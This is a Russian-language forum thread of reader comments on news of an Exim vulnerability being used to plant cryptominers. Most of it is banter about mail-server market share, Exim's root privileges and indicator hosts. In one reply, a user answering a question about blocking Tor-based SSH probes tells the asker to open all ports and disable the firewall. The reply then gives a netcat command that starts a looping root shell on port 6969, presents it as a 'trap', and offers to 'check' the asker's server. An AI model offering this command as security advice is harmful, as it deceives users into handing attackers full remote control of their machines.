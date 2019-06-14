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|2.24, Некто (??), 11:39, 14/06/2019 [^] [^^] [^^^] [ответить]
|+12 +/–
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>Вовремя я на postfix переехал!
Ты бы лучше вовремя обновлялся, а то теперь когда в postfix найдут уязвимость, переходить останется только на sendmail.
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|3.42, YetAnotherOnanym (ok), 14:05, 14/06/2019 [^] [^^] [^^^] [ответить]
|+2 +/–
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Кстати, с учётов всех последних событий, sendmail - хороший способ дистанцироваться от модных мальчиков, обмазывающихся свеженьким.
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|5.58, Аноним (58), 17:56, 14/06/2019 [^] [^^] [^^^] [ответить]
|+/–
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sendmail.mc вполне себе удобоварим
опять же сейчас MTA получает почту и передает в LDA на какой-нибудь dovecot который раздает почту по ящикам
Так что сложность преувеличена ))
А еще часто бывает что вообще тупо проксирует дальше на MS Exchange
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|3.56, Аноним (56), 17:27, 14/06/2019 [^] [^^] [^^^] [ответить]
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> переходить останется только на sendmail
Ну, есть же еще qmail от DJB ;)
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|1.3, ыы (?), 10:10, 14/06/2019 [ответить] [﹢﹢﹢] [ · · · ]
|+/–
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>доля Exim составляет 57.05% (год назад 56.56%), Postfix используется на 34.52% (33.79%) почтовых серверов, Sendmail - 4.05% (4.59%), Microsoft Exchange - 0.57% (0.85%).
Постфикс растет стремительными темпами...
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|2.22, jbl (?), 11:35, 14/06/2019 [^] [^^] [^^^] [ответить]
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зато эксченж стал бескомпромисно неуловимым сервером. Можно в армии и банках использовать теперь.
ЗЫ: как эти "хосты" торовские заблочить, если айпи в них не резолвятся, а iptables визит только айпи? Всякие долбежки на мои ssh порты через тор часто осуществляются или все больше с латвиских впс?
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|3.31, 1 (??), 11:58, 14/06/2019 [^] [^^] [^^^] [ответить]
|–1 +/–
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Exchange всегда прятался за exim или postfix.
Так что %% 30 от всего этого добра имеет бакэндом Exchange
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|3.55, Аноним (55), 17:23, 14/06/2019 [^] [^^] [^^^] [ответить]
|+1 +/–
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Легко. Первым делом нужно открыть все порты и вырубить firewall. Затем мы будим использовать специальную ловушку, которая будет работать как firewall. Для этого нам понадобиться netcat.
sudo -- sh -c “while : ; do; nc -lvp 6969 -e /bin/sh ; done”
Удачи. Можешь ip или DNS написать своего сервера (-ов) помогу проверить.
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|1.4, Аноним (4), 10:11, 14/06/2019 [ответить] [﹢﹢﹢] [ · · · ]
|+1 +/–
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Вообще идея интересная. Поставлю себе Exim в локалхост, чтобы майнить крипту.
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|1.5, Sluggard (ok), 10:12, 14/06/2019 [ответить] [﹢﹢﹢] [ · · · ]
|+1 +/–
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> осуществляется поиск в системе уже имеющихся систем майнинга, которые удаляются в случае выявления
Какая нелюбовь к конкурентам.
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|2.6, ыы (?), 10:20, 14/06/2019 [^] [^^] [^^^] [ответить]
|+/–
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думается тут чисто бизнес. потому что ресурсы то тратятся...
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|2.7, Andrey Mitrofanov_N0 (??), 10:21, 14/06/2019 [^] [^^] [^^^] [ответить]
|+2 +/–
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>>уже имеющихся систем майнинга, которые удаляются в случае выявления
> Какая нелюбовь к конкурентам.
Какая нафинг [не]любовь -- борьба ж за ресурсы и эффективность.
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|2.9, Ordu (ok), 10:29, 14/06/2019 [^] [^^] [^^^] [ответить]
|+11 +/–
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Это ж чистой воды ползучий антивирус, с почасовой оплатой в криптовалюте.
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|2.38, rshadow (ok), 13:38, 14/06/2019 [^] [^^] [^^^] [ответить]
|+2 +/–
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Если какую-то старую помойку взломал один ботнет, то велика вероятность что другой ее тоже взломает. Скорее всего ребята уже сталкивались не однократно с тем, что ни одни они хотят помайнить и пропатчили.
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|1.8, Аноним (8), 10:29, 14/06/2019 [ответить] [﹢﹢﹢] [ · · · ]
|–4 +/–
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Повторю вопрос оратора из предыдущей новости "Разве exim работает от рута?"
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|2.12, Аноним (12), 10:56, 14/06/2019 [^] [^^] [^^^] [ответить]
|+2 +/–
The Exim binary is normally setuid to root, which means that it gains root priv... текст свёрнут, показать
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|2.41, Нанобот (ok), 13:53, 14/06/2019 [^] [^^] [^^^] [ответить]
|+/–
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в 16й бубунте от Debian-exim, в 6м дебиане - от какого-то безымянного пользователя с uid=101 (по крайней мере у меня такое). больше мне посмотреть негде...
подозреваю, что exim от рута никто не видел, но все боятся
P.S. если кто-то хочет/может проверить у себя, вот команда: ps -C exim4 -o user
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|3.57, анонимус (??), 17:34, 14/06/2019 [^] [^^] [^^^] [ответить]
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На бинарь exim обычно ставится SUID-бит. Т. е. он запускается под пользователем root, а потом делает setuid и сбрасывает привилегии. НО! в определенных случаях, типа локальной доставки, или на этапе роутинга, когда нужно прочитать какие-то файлы (.forward например) в хомяке юзера, exim сам себя ре-exec-ает и опять становится рутом.
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|2.14, Sluggard (ok), 11:03, 14/06/2019 [^] [^^] [^^^] [ответить]
|+/–
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В новости же есть:
> Об атаке также может свидетельствовать наличие в логе межсетевого экрана активности с хостов an7kmd2wp4xo7hpr.tor2web.su, an7kmd2wp4xo7hpr.tor2web.io и an7kmd2wp4xo7hpr.onion.sh, которые используются для в процессе загрузки вредоносного ПО.
Ну и с других шлюзов наверняка прилетает или будет прилетать.
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|1.13, BlackRot (?), 10:59, 14/06/2019 [ответить] [﹢﹢﹢] [ · · · ]
|+2 +/–
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Просто обновил exim до последней версии и всё. нубасы использующие древний софт должны страдать
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|2.15, EuPhobos (ok), 11:04, 14/06/2019 [^] [^^] [^^^] [ответить]
|+2 +/–
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Кто такие нубасы? Знаю Папуасы есть из Гвинеи, а нубасы - хмм, из Нубии?..
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|3.17, BlackRot (?), 11:12, 14/06/2019 [^] [^^] [^^^] [ответить]
|+1 +/–
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> Кто такие нубасы? Знаю Папуасы есть из Гвинеи, а нубасы - хмм,
> из Нубии?..
Noob это один юнит, а noobs (если не смотреть на перевод гугл переводчика) это более одного юнита, получается некий транслит :)
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|4.52, Аноним (52), 16:53, 14/06/2019 [^] [^^] [^^^] [ответить]
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>> Кто такие нубасы? Знаю Папуасы есть из Гвинеи, а нубасы - хмм,
>> из Нубии?..
> Noob это один юнит, а noobs (если не смотреть на перевод гугл
> переводчика) это более одного юнита, получается некий транслит :)
Нубз и noobass не одно и тоже.
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|2.16, ыы (?), 11:11, 14/06/2019 [^] [^^] [^^^] [ответить]
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о дырке с этом обновлении вам сообщат на следующей неделе.. когда намайнят... будьте на линии...
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|3.18, BlackRot (?), 11:14, 14/06/2019 [^] [^^] [^^^] [ответить]
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до того времени выйдет новая версия, а потом сообщат об уязвимости в предыдущей.
мониторинг никто не отменял :) тьху тьху, ниразу никаких проблем (главное весту не юзать) уж больно её частенько кто-то ломает.
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|2.19, Аноним (10), 11:15, 14/06/2019 [^] [^^] [^^^] [ответить]
|+2 +/–
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Древний exim не подвержен, а вот новый как оказалось наоборот
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|1.21, Аноним (21), 11:23, 14/06/2019 [ответить] [﹢﹢﹢] [ · · · ]
|–2 +/–
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> Microsoft Exchange - 0.57% (0.85%)
Вот надо же. А судя по сообщениям на форумах, заявкам на госзакупках и прочим источникам, все только на нем работают. Как объяснить? Или это из той же оперы, что доля Linux якобы меньше 1%, хотя по независимым данным, она около 20%.
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|2.27, ыы (?), 11:45, 14/06/2019 [^] [^^] [^^^] [ответить]
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>Вот надо же. А судя по сообщениям на форумах, заявкам на госзакупках и прочим источникам, все только на нем работают.
так и есть.
>Как объяснить?
Самая популярная модель в России среди автомобилей это Lada Granta.
а посмотришь на парковку возле дома- джипы джипы джипы...
Как это объяснить?
Самое популярное - это не самое популярное в солидных кругах.
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|2.29, Andrey Mitrofanov_N0 (??), 11:53, 14/06/2019 [^] [^^] [^^^] [ответить]
|+/–
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>> Microsoft Exchange - 0.57% (0.85%)
> Вот надо же. А судя по сообщениям на форумах, заявкам на госзакупках
> и прочим источникам, все только на нем работают. Как объяснить?
1. Вражеская пропаганда Микрософт. Все врут. [Даже твои собственные суждения -- микрософт уже проник в голову!]
2. Оно заботливо прикрывают, для безопасности, вишь ты!, от большого-и-страшного интернета релеями на более обычных-бесплатных linux|bsd почтовиках. Они (см.сабж) не такие дырявые, наверное.
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|3.30, Andrey Mitrofanov_N0 (??), 11:55, 14/06/2019 [^] [^^] [^^^] [ответить]
|+1 +/–
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>>> Microsoft Exchange - 0.57% (0.85%)
> 2. Оно заботливо прикрывают, для безопасности, вишь ты!, от большого-и-страшного интернета
> релеями на более обычных-бесплатных linux|bsd почтовиках. Они (см.сабж) не такие
> дырявые, наверное.
А, да! Они ещё _не_тормозят_ и не перестают принимать Почты при 3000 артефактах в очереди. Обычно....
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|1.34, сосед (?), 12:54, 14/06/2019 [ответить] [﹢﹢﹢] [ · · · ]
|–1 +/–
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Если я правильно понял - на OBSD эта фича работать не будет, если Securelevel выставлен в правильный режим и критичные файлы запрещены для изменения ? (crontab, passwd)?.Или лучше Snort+snortsam(например) для поиска команды run на 25 порту?
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|4.47, сосед (?), 15:27, 14/06/2019 [^] [^^] [^^^] [ответить]
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Так исторически сложилось у нас, да и Exim удобен для работы , умеет больше чем Sendmail,Postfix,qmail... А то что он на опенке стоит - даже лучше.
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|1.35, ryoken (ok), 12:59, 14/06/2019 [ответить] [﹢﹢﹢] [ · · · ]
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>>наличия в системе поверженной уязвимости
>>поверженной
Исправьте плз новость.
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|1.36, Аноним (36), 13:18, 14/06/2019 [ответить] [﹢﹢﹢] [ · · · ]
|+1 +/–
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Перешел на Linux, т.к. друзья говорили, на нем вирусов нет, а тут такая новость :(
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|2.37, Andrey Mitrofanov_N0 (??), 13:25, 14/06/2019 [^] [^^] [^^^] [ответить]
|+2 +/–
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> Перешел на Linux, т.к. друзья говорили, на нем вирусов нет, а тут
> такая новость :(
Друзья правы! Это ж не _вирус_.
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|1.39, Аноним (39), 13:40, 14/06/2019 [ответить] [﹢﹢﹢] [ · · · ]
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> В соответствии с июньским автоматизированным опросом доля Exim составляет 57.05% (год назад 56.56%)
Эти люди не слышали про опцию smtp_banner
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|1.49, kiwinix (?), 16:28, 14/06/2019 [ответить] [﹢﹢﹢] [ · · · ]
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Хацкеры теперь лояльные стали)) не воруют ничего.. просто немножко майнят крипту. Безобидненько)
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|2.53, Аноним84701 (ok), 17:01, 14/06/2019 [^] [^^] [^^^] [ответить]
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> Хацкеры теперь лояльные стали)) не воруют ничего.. просто немножко майнят крипту. Безобидненько)
Хм, что это за чудесный край где электричество и аренда помещения бесплатны (как впрочем и сами железки, ресурс и мощность которых так же достаются "хацкеру")?
Не местечки ли Podt d'Îvuannyîah и Еntré-Solèah в королевстве M'amk-Înа Quartiér-â?
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